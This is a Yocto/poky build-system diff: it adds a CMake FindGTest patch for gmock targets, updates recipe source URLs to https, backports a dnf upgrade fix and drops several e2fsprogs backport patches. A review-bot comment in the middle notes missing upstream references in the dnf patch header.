@@ -0,0 +1,255 @@ +From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001 +From: Eero Aaltonen <eero.aaltonen@iki.fi> +Date: Sun, 17 Oct 2021 17:13:07 +0300 +Subject: [PATCH] FindGTest: Add target for gmock library + +`googlemock` has been absorbed into the +[googletest](https://github.com/google/googletest) project and is built +and installed from the same source tree. + +As GTest may be built with or without GMock, skip GMock if it is not +present. + +Do not provide result variables for GMock. They are not provided by +upstream GTest's CMake Package Configuration File. + +Also update the test case to cover linking to `GTest::gmock`. + +The patch was imported from the Kitware git server +(git@gitlab.kitware.com:cmake/cmake.git) as of commit id +50bf457a0dd857cf976b22c5be7d333493233d1e + +Patch was modified to support upper case variable `GTEST_FOUND`. + +Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632] +Milestone: 3.23.0 + +Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com> +--- + .../dev/FindGTest-target-for-gmock.rst | 4 + + Modules/FindGTest.cmake | 133 +++++++++++++++--- + Tests/FindGTest/Test/CMakeLists.txt | 4 + + 3 files changed, 121 insertions(+), 20 deletions(-) + create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst + +diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst +new file mode 100644 +index 0000000000..f78242c80e +--- /dev/null ++++ b/Help/release/dev/FindGTest-target-for-gmock.rst +@@ -0,0 +1,4 @@ ++FindGTest-target-for-gmock ++-------------------------- ++ ++* The :module:`FindGTest` module now provides a target for GMock, if found. +diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake +index e015a9840f..0331049594 100644 +--- a/Modules/FindGTest.cmake ++++ b/Modules/FindGTest.cmake +@@ -7,10 +7,23 @@ FindGTest + + Locate the Google C++ Testing Framework. + ++.. 
versionadded:: 3.20 ++ Upstream ``GTestConfig.cmake`` is used if possible. ++ + Imported targets + ^^^^^^^^^^^^^^^^ + +-This module defines the following :prop_tgt:`IMPORTED` targets: ++ This module defines the following :prop_tgt:`IMPORTED` targets: ++ ++``GTest::gtest`` ++ The Google Test ``gtest`` library, if found; adds Thread::Thread ++ automatically ++``GTest::gtest_main`` ++ The Google Test ``gtest_main`` library, if found ++ ++.. deprecated:: 3.20 ++ For backwards compatibility, this module defines additionally the ++ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5): + + ``GTest::GTest`` + The Google Test ``gtest`` library, if found; adds Thread::Thread +@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets: + ``GTest::Main`` + The Google Test ``gtest_main`` library, if found + +- + Result variables + ^^^^^^^^^^^^^^^^ + +@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config) + endif() + endfunction() + ++function(__gtest_define_backwards_compatible_library_targets) ++ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE) ++ ++ # Add targets mapping the same library names as defined in ++ # older versions of CMake's FindGTest ++ if(NOT TARGET GTest::GTest) ++ add_library(GTest::GTest INTERFACE IMPORTED) ++ target_link_libraries(GTest::GTest INTERFACE GTest::gtest) ++ endif() ++ if(NOT TARGET GTest::Main) ++ add_library(GTest::Main INTERFACE IMPORTED) ++ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main) ++ endif() ++endfunction() ++ + # + ++include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) ++ ++# first specifically look for the CMake version of GTest ++find_package(GTest QUIET NO_MODULE) ++ ++# if we found the GTest cmake package then we are done, and ++# can print what we found and return. 
++if(GTest_FOUND) ++ set(GTEST_FOUND ${GTest_FOUND}) ++ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE) ++ ++ set(GTEST_LIBRARIES GTest::gtest) ++ set(GTEST_MAIN_LIBRARIES GTest::gtest_main) ++ ++ __gtest_define_backwards_compatible_library_targets() ++ ++ return() ++endif() ++ + if(NOT DEFINED GTEST_MSVC_SEARCH) + set(GTEST_MSVC_SEARCH MD) + endif() +@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD") + __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd) + __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main) + __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind) ++ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock) ++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind) + else() + __gtest_find_library(GTEST_LIBRARY gtest) + __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd) + __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main) + __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind) ++ __gtest_find_library(GMOCK_LIBRARY gmock) ++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind) + endif() + +-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) + FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY) + +-if(GTEST_FOUND) ++if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY) ++ set(GMock_FOUND True) ++else() ++ set(GMock_FOUND False) ++endif() ++ ++if(GTest_FOUND) + set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR}) + __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY) + __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY) +- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES}) + + find_package(Threads QUIET) + +- if(NOT TARGET GTest::GTest) ++ 
if(NOT TARGET GTest::gtest) + __gtest_determine_library_type(GTEST_LIBRARY) +- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED) ++ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED) + if(TARGET Threads::Threads) +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_LINK_LIBRARIES Threads::Threads) + endif() + if(GTEST_LIBRARY_TYPE STREQUAL "SHARED") +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1") + endif() + if(GTEST_INCLUDE_DIRS) +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}") + endif() +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "") +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE") +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG") + endif() +- if(NOT TARGET GTest::Main) ++ if(NOT TARGET GTest::gtest_main) + __gtest_determine_library_type(GTEST_MAIN_LIBRARY) +- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED) +- set_target_properties(GTest::Main PROPERTIES +- INTERFACE_LINK_LIBRARIES "GTest::GTest") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG") ++ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED) ++ set_target_properties(GTest::gtest_main PROPERTIES ++ INTERFACE_LINK_LIBRARIES "GTest::gtest") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gtest_main 
GTEST_MAIN_LIBRARY "DEBUG") ++ endif() ++ ++ __gtest_define_backwards_compatible_library_targets() ++endif() ++ ++if(GMock_FOUND) ++ if(NOT TARGET GTest::gmock) ++ __gtest_determine_library_type(GMOCK_LIBRARY) ++ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED) ++ set(_gmock_link_libraries "GTest::gtest") ++ if(TARGET Threads::Threads) ++ list(APPEND _gmock_link_libraries Threads::Threads) ++ endif() ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}") ++ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED") ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1") ++ endif() ++ if(GTEST_INCLUDE_DIRS) ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}") ++ endif() ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "") ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG") ++ endif() ++ if(NOT TARGET GTest::gmock_main) ++ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY) ++ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED) ++ set_target_properties(GTest::gmock_main PROPERTIES ++ INTERFACE_LINK_LIBRARIES "GTest::gmock") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG") + endif() + endif() +diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt +index b65b9d28f6..7d3a378a65 100644 +--- a/Tests/FindGTest/Test/CMakeLists.txt ++++ b/Tests/FindGTest/Test/CMakeLists.txt +@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx) + target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS}) + target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT}) + add_test(NAME test_gtest_var 
COMMAND test_gtest_var) ++ ++add_executable(test_gmock_tgt main.cxx) ++target_link_libraries(test_gmock_tgt GTest::gmock_main) ++add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt) +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb index c6a53ffece..3c403a4077 100644 --- a/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb +++ b/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/rpm-software-management/createrepo_c \ +SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \ file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ " diff --git a/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb index 9a36cfe525..2a74a068f1 100644 --- a/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb +++ b/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb @@ -15,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt" RRECOMMENDS_${PN}-server = "avahi-daemon" -SRC_URI = "git://github.com/distcc/distcc.git \ +SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \ file://fix-gnome.patch \ file://separatebuilddir.patch \ file://default \ diff --git a/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch new file mode 100644 index 0000000000..57c2375a54 --- /dev/null +++ b/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch 
@@ -0,0 +1,60 @@ +From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001 +From: Jaroslav Mracek <jmracek@redhat.com> +Date: Tue, 3 Sep 2019 11:01:51 +0200 +Subject: [PATCH] Keep installed packages in upgrade job + (RhBug:1728252,1644241,1741381) + +In combination with marking of job as TARGETED it prevents from +reinstalling of modified packages with same NEVRA. + +https://bugzilla.redhat.com/show_bug.cgi?id=1728252 +https://bugzilla.redhat.com/show_bug.cgi?id=1644241 +https://bugzilla.redhat.com/show_bug.cgi?id=1741381 + +Closes: #1474 +Approved by: m-blaha + + +Backport to fix bug in dnf in oe-core +from https://github.com/rpm-software-management/dnf + +Removed spec file portion of patch + +Upstream-Status: Backport +Signed-off-by: Jate Sujjavanich <jatedev@gmail.com> +--- + dnf.spec | 4 ++-- + dnf/base.py | 3 --- + dnf/module/module_base.py | 2 +- + 3 files changed, 3 insertions(+), 6 deletions(-) + +diff --git a/dnf/base.py b/dnf/base.py +index b2ced61..628c154 100644 +--- a/dnf/base.py ++++ b/dnf/base.py +@@ -1968,9 +1968,6 @@ class Base(object): + obsoletes=q.installed().union(q.upgrades())) + # add obsoletes into transaction + q = q.union(obsoletes) +- # provide only available packages to solver otherwise selection of available +- # possibilities will be ignored +- q = q.available() + if reponame is not None: + q.filterm(reponame=reponame) + q = self._merge_update_filters(q, pkg_spec=pkg_spec) +diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py +index 976d730..ce70f63 100644 +--- a/dnf/module/module_base.py ++++ b/dnf/module/module_base.py +@@ -214,7 +214,7 @@ class ModuleBase(object): + + if not upgrade_package_set: + logger.error(_("Unable to match profile in argument {}").format(spec)) +- query = self.base.sack.query().available().filterm(name=upgrade_package_set) ++ query = self.base.sack.query().filterm(name=upgrade_package_set) + if query: + sltr = dnf.selector.Selector(self.base.sack) + sltr.set(pkg=query) +-- +2.7.4 + 
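Review bot: The header of 0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch says only `Upstream-Status: Backport`, with no upstream commit reference, so the backport cannot be checked against the dnf repository without searching for it. The e2fsprogs backports visible elsewhere in this commit use the bracketed form, which here would be `Upstream-Status: Backport [<upstream-commit-url>]`. The diffstat also still lists `dnf.spec | 4 ++--` and "3 files changed, 3 insertions(+), 6 deletions(-)" although the description says the spec file portion was removed. Trimming it to the two files actually patched would make the header match the content.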
diff --git a/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb index 7831e1ac5a..6b6b233d6d 100644 --- a/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb +++ b/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \ " -SRC_URI = "git://github.com/rpm-software-management/dnf.git \ +SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \ file://0001-Corretly-install-tmpfiles.d-configuration.patch \ file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \ file://0005-Do-not-prepend-installroot-to-logdir.patch \ @@ -16,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \ file://0030-Run-python-scripts-using-env.patch \ file://Fix-SyntaxWarning.patch \ file://0001-set-python-path-for-completion_helper.patch \ + file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \ " SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d" diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc index 009f5ed807..45fb9720ee 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc @@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \ SECTION = "base" DEPENDS = "util-linux attr" -SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git" +SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master" S = "${WORKDIR}/git" inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest 
diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch deleted file mode 100644 index ba4e3a3c97..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch +++ /dev/null 
@@ -1,49 +0,0 @@ -From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001 -From: Theodore Ts'o <tytso@mit.edu> -Date: Thu, 19 Dec 2019 19:45:06 -0500 -Subject: [PATCH] e2fsck: don't try to rehash a deleted directory - -If directory has been deleted in pass1[bcd] processing, then we -shouldn't try to rehash the directory in pass 3a when we try to -rehash/reoptimize directories. - -Signed-off-by: Theodore Ts'o <tytso@mit.edu> - -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3] -Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> ---- - e2fsck/pass1b.c | 4 ++++ - e2fsck/rehash.c | 2 ++ - 2 files changed, 6 insertions(+) - -diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c -index 5693b9cf..bca701ca 100644 ---- a/e2fsck/pass1b.c -+++ b/e2fsck/pass1b.c -@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino, - fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx); - if (ctx->inode_bad_map) - ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino); -+ if (ctx->inode_reg_map) -+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino); -+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino); -+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino); - ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode)); - quota_data_sub(ctx->qctx, &dp->inode, ino, - pb.dup_blocks * fs->blocksize); -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index 3dd1e941..2c908be0 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx) - if (!ext2fs_u32_list_iterate(iter, &ino)) - break; - } -+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino)) -+ continue; - - pctx.dir = ino; - if (first) { --- -2.24.1 - 
diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch deleted file mode 100644 index fc4a540986..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch +++ /dev/null @@ -1,41 +0,0 @@ -From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001 -From: Robert Yang <liezhi.yang@windriver.com> -Date: Wed, 13 Sep 2017 19:55:35 -0700 -Subject: [PATCH] misc/create_inode.c: set dir's mode correctly - -The dir's mode has been set by ext2fs_mkdir() with umask, so -reset it to the source's mode in set_inode_extra(). - -Fixed when source dir's mode is 521, but tarball would be 721, this was -incorrect. - -Upstream-Status: Submitted - -Signed-off-by: Robert Yang <liezhi.yang@windriver.com> ---- - misc/create_inode.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/misc/create_inode.c b/misc/create_inode.c -index 8ce3faf..50fbaa8 100644 ---- a/misc/create_inode.c -+++ b/misc/create_inode.c -@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino, - - inode.i_uid = st->st_uid; - inode.i_gid = st->st_gid; -- inode.i_mode |= st->st_mode; -+ /* -+ * The dir's mode has been set by ext2fs_mkdir() with umask, so -+ * reset it to the source's mode -+ */ -+ if S_ISDIR(st->st_mode) -+ inode.i_mode = LINUX_S_IFDIR | st->st_mode; -+ else -+ inode.i_mode |= st->st_mode; - inode.i_atime = st->st_atime; - inode.i_mtime = st->st_mtime; - inode.i_ctime = st->st_ctime; --- -2.10.2 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch deleted file mode 100644 index de4bce0037..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch +++ /dev/null 
@@ -1,57 +0,0 @@ -From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001 -From: Theodore Ts'o <tytso@mit.edu> -Date: Thu, 19 Dec 2019 19:37:34 -0500 -Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when - rehashing - -In e2fsck pass 3a, when we are rehashing directories, at least in -theory, all of the directories should have had corruptions with -respect to directory entry structure fixed. However, it's possible -(for example, if the user declined a fix) that we can reach this stage -of processing with a corrupted directory entries. - -So check for that case and don't try to process a corrupted directory -block so we don't run into trouble in mutate_name() if there is a -zero-length file name. - -Addresses: TALOS-2019-0973 -Addresses: CVE-2019-5188 -Signed-off-by: Theodore Ts'o <tytso@mit.edu> - -CVE: CVE-2019-5188 -Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff] ---- - e2fsck/rehash.c | 9 +++++++++ - 1 file changed, 9 insertions(+) - -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index a5fc1be1..3dd1e941 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs, - dir_offset += rec_len; - if (dirent->inode == 0) - continue; -+ if ((name_len) == 0) { -+ fd->err = EXT2_ET_DIR_CORRUPTED; -+ return BLOCK_ABORT; -+ } - if (!fd->compress && (name_len == 1) && - (dirent->name[0] == '.')) - continue; -@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs, - continue; - } - new_len = ext2fs_dirent_name_len(ent->dir); -+ if (new_len == 0) { -+ /* should never happen */ -+ ext2fs_unmark_valid(fs); -+ continue; -+ } - memcpy(new_name, ent->dir->name, new_len); - mutate_name(new_name, &new_len); - for (j=0; j < fd->num_array; j++) { --- -2.24.1 - 
diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch deleted file mode 100644 index 342a2b855b..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch +++ /dev/null 
@@ -1,76 +0,0 @@ -From: Wang Shilong <wshilong@ddn.com> -Date: Mon, 30 Dec 2019 19:52:39 -0500 -Subject: e2fsck: fix use after free in calculate_tree() - -The problem is alloc_blocks() will call get_next_block() which might -reallocate outdir->buf, and memory address could be changed after -this. To fix this, pointers that point into outdir->buf, such as -int_limit and root need to be recaulated based on the new starting -address of outdir->buf. - -[ Changed to correctly recalculate int_limit, and to optimize how we - reallocate outdir->buf. -TYT ] - -Addresses-Debian-Bug: 948517 -Signed-off-by: Wang Shilong <wshilong@ddn.com> -Signed-off-by: Theodore Ts'o <tytso@mit.edu> -(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01) - -Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01] ---- - e2fsck/rehash.c | 17 ++++++++++++++++- - 1 file changed, 16 insertions(+), 1 deletion(-) - -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index 0a5888a9..2574e151 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir, - errcode_t retval; - - if (outdir->num >= outdir->max) { -- retval = alloc_size_dir(fs, outdir, outdir->max + 50); -+ int increment = outdir->max / 10; -+ -+ if (increment < 50) -+ increment = 50; -+ retval = alloc_size_dir(fs, outdir, outdir->max + increment); - if (retval) - return retval; - } -@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs, - if (retval) - return retval; - -+ /* outdir->buf might be reallocated */ -+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset); -+ - *next_ent = set_int_node(fs, block_start); - *limit = (struct ext2_dx_countlimit *)(*next_ent); - if (next_offset) -@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs, - return retval; - } - if (c3 == 0) { -+ int 
delta1 = (char *)int_limit - outdir->buf; -+ int delta2 = (char *)root - outdir->buf; -+ - retval = alloc_blocks(fs, &limit, &int_ent, - &dx_ent, &int_offset, - NULL, outdir, i, &c2, -@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs, - if (retval) - return retval; - -+ /* outdir->buf might be reallocated */ -+ int_limit = (struct ext2_dx_countlimit *) -+ (outdir->buf + delta1); -+ root = (struct ext2_dx_entry *) -+ (outdir->buf + delta2); - } - dx_ent->block = ext2fs_cpu_to_le32(i); - if (c3 != limit->limit) --- -2.24.1 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch index 4d335af4cf..284ac90196 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch @@ -1,4 +1,4 @@ -From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001 +From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001 From: Jackie Huang <jackie.huang@windriver.com> Date: Wed, 10 Aug 2016 11:19:44 +0800 Subject: [PATCH] Fix missing check for permission denied. diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch index 95e6a7a2d5..aac88eed98 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch @@ -1,4 +1,4 @@ -From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001 +From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001 From: Ross Burton <ross.burton@intel.com> Date: Mon, 23 Dec 2013 13:38:34 +0000 Subject: [PATCH] e2fsprogs: silence debugfs 
